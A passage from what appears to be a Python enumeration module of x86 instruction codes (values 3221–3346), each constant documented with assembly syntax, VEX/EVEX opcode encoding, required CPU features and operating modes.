``16/32/64-bit``
"""
EVEX_VPERMT2B_YMM_K1Z_YMM_YMMM256: int = 3221
"""
``VPERMT2B ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 7D /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMT2B_ZMM_K1Z_ZMM_ZMMM512: int = 3222
"""
``VPERMT2B zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 7D /r``
``AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMT2W_XMM_K1Z_XMM_XMMM128: int = 3223
"""
``VPERMT2W xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 7D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMT2W_YMM_K1Z_YMM_YMMM256: int = 3224
"""
``VPERMT2W ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 7D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMT2W_ZMM_K1Z_ZMM_ZMMM512: int = 3225
"""
``VPERMT2W zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 7D /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMT2D_XMM_K1Z_XMM_XMMM128B32: int = 3226
"""
``VPERMT2D xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 7E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2D_YMM_K1Z_YMM_YMMM256B32: int = 3227
"""
``VPERMT2D ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 7E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2D_ZMM_K1Z_ZMM_ZMMM512B32: int = 3228
"""
``VPERMT2D zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 7E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2Q_XMM_K1Z_XMM_XMMM128B64: int = 3229
"""
``VPERMT2Q xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 7E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2Q_YMM_K1Z_YMM_YMMM256B64: int = 3230
"""
``VPERMT2Q ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 7E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2Q_ZMM_K1Z_ZMM_ZMMM512B64: int = 3231
"""
``VPERMT2Q zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 7E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PS_XMM_K1Z_XMM_XMMM128B32: int = 3232
"""
``VPERMT2PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PS_YMM_K1Z_YMM_YMMM256B32: int = 3233
"""
``VPERMT2PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3234
"""
``VPERMT2PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 7F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PD_XMM_K1Z_XMM_XMMM128B64: int = 3235
"""
``VPERMT2PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PD_YMM_K1Z_YMM_YMMM256B64: int = 3236
"""
``VPERMT2PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3237
"""
``VPERMT2PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 7F /r``
``AVX512F``
``16/32/64-bit``
"""
INVEPT_R32_M128: int = 3238
"""
``INVEPT r32, m128``
``66 0F 38 80 /r``
``VMX and IA32_VMX_EPT_VPID_CAP[bit 20]``
``16/32-bit``
"""
INVEPT_R64_M128: int = 3239
"""
``INVEPT r64, m128``
``66 0F 38 80 /r``
``VMX and IA32_VMX_EPT_VPID_CAP[bit 20]``
``64-bit``
"""
INVVPID_R32_M128: int = 3240
"""
``INVVPID r32, m128``
``66 0F 38 81 /r``
``VMX and IA32_VMX_EPT_VPID_CAP[bit 32]``
``16/32-bit``
"""
INVVPID_R64_M128: int = 3241
"""
``INVVPID r64, m128``
``66 0F 38 81 /r``
``VMX and IA32_VMX_EPT_VPID_CAP[bit 32]``
``64-bit``
"""
INVPCID_R32_M128: int = 3242
"""
``INVPCID r32, m128``
``66 0F 38 82 /r``
``INVPCID``
``16/32-bit``
"""
INVPCID_R64_M128: int = 3243
"""
``INVPCID r64, m128``
``66 0F 38 82 /r``
``INVPCID``
``64-bit``
"""
EVEX_VPMULTISHIFTQB_XMM_K1Z_XMM_XMMM128B64: int = 3244
"""
``VPMULTISHIFTQB xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 83 /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPMULTISHIFTQB_YMM_K1Z_YMM_YMMM256B64: int = 3245
"""
``VPMULTISHIFTQB ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 83 /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPMULTISHIFTQB_ZMM_K1Z_ZMM_ZMMM512B64: int = 3246
"""
``VPMULTISHIFTQB zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 83 /r``
``AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VEXPANDPS_XMM_K1Z_XMMM128: int = 3247
"""
``VEXPANDPS xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W0 88 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPS_YMM_K1Z_YMMM256: int = 3248
"""
``VEXPANDPS ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W0 88 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPS_ZMM_K1Z_ZMMM512: int = 3249
"""
``VEXPANDPS zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W0 88 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPD_XMM_K1Z_XMMM128: int = 3250
"""
``VEXPANDPD xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W1 88 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPD_YMM_K1Z_YMMM256: int = 3251
"""
``VEXPANDPD ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W1 88 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPD_ZMM_K1Z_ZMMM512: int = 3252
"""
``VEXPANDPD zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W1 88 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDD_XMM_K1Z_XMMM128: int = 3253
"""
``VPEXPANDD xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W0 89 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDD_YMM_K1Z_YMMM256: int = 3254
"""
``VPEXPANDD ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W0 89 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDD_ZMM_K1Z_ZMMM512: int = 3255
"""
``VPEXPANDD zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W0 89 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDQ_XMM_K1Z_XMMM128: int = 3256
"""
``VPEXPANDQ xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W1 89 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDQ_YMM_K1Z_YMMM256: int = 3257
"""
``VPEXPANDQ ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W1 89 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDQ_ZMM_K1Z_ZMMM512: int = 3258
"""
``VPEXPANDQ zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W1 89 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPS_XMMM128_K1Z_XMM: int = 3259
"""
``VCOMPRESSPS xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W0 8A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPS_YMMM256_K1Z_YMM: int = 3260
"""
``VCOMPRESSPS ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W0 8A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPS_ZMMM512_K1Z_ZMM: int = 3261
"""
``VCOMPRESSPS zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W0 8A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPD_XMMM128_K1Z_XMM: int = 3262
"""
``VCOMPRESSPD xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W1 8A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPD_YMMM256_K1Z_YMM: int = 3263
"""
``VCOMPRESSPD ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W1 8A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPD_ZMMM512_K1Z_ZMM: int = 3264
"""
``VCOMPRESSPD zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W1 8A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSD_XMMM128_K1Z_XMM: int = 3265
"""
``VPCOMPRESSD xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W0 8B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSD_YMMM256_K1Z_YMM: int = 3266
"""
``VPCOMPRESSD ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W0 8B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSD_ZMMM512_K1Z_ZMM: int = 3267
"""
``VPCOMPRESSD zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W0 8B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSQ_XMMM128_K1Z_XMM: int = 3268
"""
``VPCOMPRESSQ xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W1 8B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSQ_YMMM256_K1Z_YMM: int = 3269
"""
``VPCOMPRESSQ ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W1 8B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSQ_ZMMM512_K1Z_ZMM: int = 3270
"""
``VPCOMPRESSQ zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W1 8B /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPMASKMOVD_XMM_XMM_M128: int = 3271
"""
``VPMASKMOVD xmm1, xmm2, m128``
``VEX.128.66.0F38.W0 8C /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVD_YMM_YMM_M256: int = 3272
"""
``VPMASKMOVD ymm1, ymm2, m256``
``VEX.256.66.0F38.W0 8C /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVQ_XMM_XMM_M128: int = 3273
"""
``VPMASKMOVQ xmm1, xmm2, m128``
``VEX.128.66.0F38.W1 8C /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVQ_YMM_YMM_M256: int = 3274
"""
``VPMASKMOVQ ymm1, ymm2, m256``
``VEX.256.66.0F38.W1 8C /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMB_XMM_K1Z_XMM_XMMM128: int = 3275
"""
``VPERMB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 8D /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMB_YMM_K1Z_YMM_YMMM256: int = 3276
"""
``VPERMB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 8D /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMB_ZMM_K1Z_ZMM_ZMMM512: int = 3277
"""
``VPERMB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 8D /r``
``AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMW_XMM_K1Z_XMM_XMMM128: int = 3278
"""
``VPERMW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 8D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMW_YMM_K1Z_YMM_YMMM256: int = 3279
"""
``VPERMW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 8D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMW_ZMM_K1Z_ZMM_ZMMM512: int = 3280
"""
``VPERMW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 8D /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VPMASKMOVD_M128_XMM_XMM: int = 3281
"""
``VPMASKMOVD m128, xmm1, xmm2``
``VEX.128.66.0F38.W0 8E /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVD_M256_YMM_YMM: int = 3282
"""
``VPMASKMOVD m256, ymm1, ymm2``
``VEX.256.66.0F38.W0 8E /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVQ_M128_XMM_XMM: int = 3283
"""
``VPMASKMOVQ m128, xmm1, xmm2``
``VEX.128.66.0F38.W1 8E /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVQ_M256_YMM_YMM: int = 3284
"""
``VPMASKMOVQ m256, ymm1, ymm2``
``VEX.256.66.0F38.W1 8E /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFBITQMB_KR_K1_XMM_XMMM128: int = 3285
"""
``VPSHUFBITQMB k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 8F /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPSHUFBITQMB_KR_K1_YMM_YMMM256: int = 3286
"""
``VPSHUFBITQMB k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 8F /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPSHUFBITQMB_KR_K1_ZMM_ZMMM512: int = 3287
"""
``VPSHUFBITQMB k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 8F /r``
``AVX512_BITALG``
``16/32/64-bit``
"""
VEX_VPGATHERDD_XMM_VM32X_XMM: int = 3288
"""
``VPGATHERDD xmm1, vm32x, xmm2``
``VEX.128.66.0F38.W0 90 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERDD_YMM_VM32Y_YMM: int = 3289
"""
``VPGATHERDD ymm1, vm32y, ymm2``
``VEX.256.66.0F38.W0 90 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERDQ_XMM_VM32X_XMM: int = 3290
"""
``VPGATHERDQ xmm1, vm32x, xmm2``
``VEX.128.66.0F38.W1 90 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERDQ_YMM_VM32X_YMM: int = 3291
"""
``VPGATHERDQ ymm1, vm32x, ymm2``
``VEX.256.66.0F38.W1 90 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPGATHERDD_XMM_K1_VM32X: int = 3292
"""
``VPGATHERDD xmm1 {k1}, vm32x``
``EVEX.128.66.0F38.W0 90 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDD_YMM_K1_VM32Y: int = 3293
"""
``VPGATHERDD ymm1 {k1}, vm32y``
``EVEX.256.66.0F38.W0 90 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDD_ZMM_K1_VM32Z: int = 3294
"""
``VPGATHERDD zmm1 {k1}, vm32z``
``EVEX.512.66.0F38.W0 90 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDQ_XMM_K1_VM32X: int = 3295
"""
``VPGATHERDQ xmm1 {k1}, vm32x``
``EVEX.128.66.0F38.W1 90 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDQ_YMM_K1_VM32X: int = 3296
"""
``VPGATHERDQ ymm1 {k1}, vm32x``
``EVEX.256.66.0F38.W1 90 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDQ_ZMM_K1_VM32Y: int = 3297
"""
``VPGATHERDQ zmm1 {k1}, vm32y``
``EVEX.512.66.0F38.W1 90 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPGATHERQD_XMM_VM64X_XMM: int = 3298
"""
``VPGATHERQD xmm1, vm64x, xmm2``
``VEX.128.66.0F38.W0 91 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERQD_XMM_VM64Y_XMM: int = 3299
"""
``VPGATHERQD xmm1, vm64y, xmm2``
``VEX.256.66.0F38.W0 91 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERQQ_XMM_VM64X_XMM: int = 3300
"""
``VPGATHERQQ xmm1, vm64x, xmm2``
``VEX.128.66.0F38.W1 91 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERQQ_YMM_VM64Y_YMM: int = 3301
"""
``VPGATHERQQ ymm1, vm64y, ymm2``
``VEX.256.66.0F38.W1 91 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPGATHERQD_XMM_K1_VM64X: int = 3302
"""
``VPGATHERQD xmm1 {k1}, vm64x``
``EVEX.128.66.0F38.W0 91 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQD_XMM_K1_VM64Y: int = 3303
"""
``VPGATHERQD xmm1 {k1}, vm64y``
``EVEX.256.66.0F38.W0 91 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQD_YMM_K1_VM64Z: int = 3304
"""
``VPGATHERQD ymm1 {k1}, vm64z``
``EVEX.512.66.0F38.W0 91 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQQ_XMM_K1_VM64X: int = 3305
"""
``VPGATHERQQ xmm1 {k1}, vm64x``
``EVEX.128.66.0F38.W1 91 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQQ_YMM_K1_VM64Y: int = 3306
"""
``VPGATHERQQ ymm1 {k1}, vm64y``
``EVEX.256.66.0F38.W1 91 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQQ_ZMM_K1_VM64Z: int = 3307
"""
``VPGATHERQQ zmm1 {k1}, vm64z``
``EVEX.512.66.0F38.W1 91 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VGATHERDPS_XMM_VM32X_XMM: int = 3308
"""
``VGATHERDPS xmm1, vm32x, xmm2``
``VEX.128.66.0F38.W0 92 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERDPS_YMM_VM32Y_YMM: int = 3309
"""
``VGATHERDPS ymm1, vm32y, ymm2``
``VEX.256.66.0F38.W0 92 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERDPD_XMM_VM32X_XMM: int = 3310
"""
``VGATHERDPD xmm1, vm32x, xmm2``
``VEX.128.66.0F38.W1 92 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERDPD_YMM_VM32X_YMM: int = 3311
"""
``VGATHERDPD ymm1, vm32x, ymm2``
``VEX.256.66.0F38.W1 92 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VGATHERDPS_XMM_K1_VM32X: int = 3312
"""
``VGATHERDPS xmm1 {k1}, vm32x``
``EVEX.128.66.0F38.W0 92 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPS_YMM_K1_VM32Y: int = 3313
"""
``VGATHERDPS ymm1 {k1}, vm32y``
``EVEX.256.66.0F38.W0 92 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPS_ZMM_K1_VM32Z: int = 3314
"""
``VGATHERDPS zmm1 {k1}, vm32z``
``EVEX.512.66.0F38.W0 92 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPD_XMM_K1_VM32X: int = 3315
"""
``VGATHERDPD xmm1 {k1}, vm32x``
``EVEX.128.66.0F38.W1 92 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPD_YMM_K1_VM32X: int = 3316
"""
``VGATHERDPD ymm1 {k1}, vm32x``
``EVEX.256.66.0F38.W1 92 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPD_ZMM_K1_VM32Y: int = 3317
"""
``VGATHERDPD zmm1 {k1}, vm32y``
``EVEX.512.66.0F38.W1 92 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VGATHERQPS_XMM_VM64X_XMM: int = 3318
"""
``VGATHERQPS xmm1, vm64x, xmm2``
``VEX.128.66.0F38.W0 93 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERQPS_XMM_VM64Y_XMM: int = 3319
"""
``VGATHERQPS xmm1, vm64y, xmm2``
``VEX.256.66.0F38.W0 93 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERQPD_XMM_VM64X_XMM: int = 3320
"""
``VGATHERQPD xmm1, vm64x, xmm2``
``VEX.128.66.0F38.W1 93 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERQPD_YMM_VM64Y_YMM: int = 3321
"""
``VGATHERQPD ymm1, vm64y, ymm2``
``VEX.256.66.0F38.W1 93 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VGATHERQPS_XMM_K1_VM64X: int = 3322
"""
``VGATHERQPS xmm1 {k1}, vm64x``
``EVEX.128.66.0F38.W0 93 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPS_XMM_K1_VM64Y: int = 3323
"""
``VGATHERQPS xmm1 {k1}, vm64y``
``EVEX.256.66.0F38.W0 93 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPS_YMM_K1_VM64Z: int = 3324
"""
``VGATHERQPS ymm1 {k1}, vm64z``
``EVEX.512.66.0F38.W0 93 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPD_XMM_K1_VM64X: int = 3325
"""
``VGATHERQPD xmm1 {k1}, vm64x``
``EVEX.128.66.0F38.W1 93 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPD_YMM_K1_VM64Y: int = 3326
"""
``VGATHERQPD ymm1 {k1}, vm64y``
``EVEX.256.66.0F38.W1 93 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPD_ZMM_K1_VM64Z: int = 3327
"""
``VGATHERQPD zmm1 {k1}, vm64z``
``EVEX.512.66.0F38.W1 93 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADDSUB132PS_XMM_XMM_XMMM128: int = 3328
"""
``VFMADDSUB132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 96 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB132PS_YMM_YMM_YMMM256: int = 3329
"""
``VFMADDSUB132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 96 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB132PD_XMM_XMM_XMMM128: int = 3330
"""
``VFMADDSUB132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 96 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB132PD_YMM_YMM_YMMM256: int = 3331
"""
``VFMADDSUB132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 96 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3332
"""
``VFMADDSUB132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 96 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3333
"""
``VFMADDSUB132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 96 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3334
"""
``VFMADDSUB132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 96 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3335
"""
``VFMADDSUB132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 96 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3336
"""
``VFMADDSUB132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 96 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3337
"""
``VFMADDSUB132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 96 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUBADD132PS_XMM_XMM_XMMM128: int = 3338
"""
``VFMSUBADD132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 97 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD132PS_YMM_YMM_YMMM256: int = 3339
"""
``VFMSUBADD132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 97 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD132PD_XMM_XMM_XMMM128: int = 3340
"""
``VFMSUBADD132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 97 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD132PD_YMM_YMM_YMMM256: int = 3341
"""
``VFMSUBADD132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 97 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3342
"""
``VFMSUBADD132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 97 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3343
"""
``VFMSUBADD132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 97 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3344
"""
``VFMSUBADD132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 97 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3345
"""
``VFMSUBADD132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 97 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3346
"""
``VFMSUBADD132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 97 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
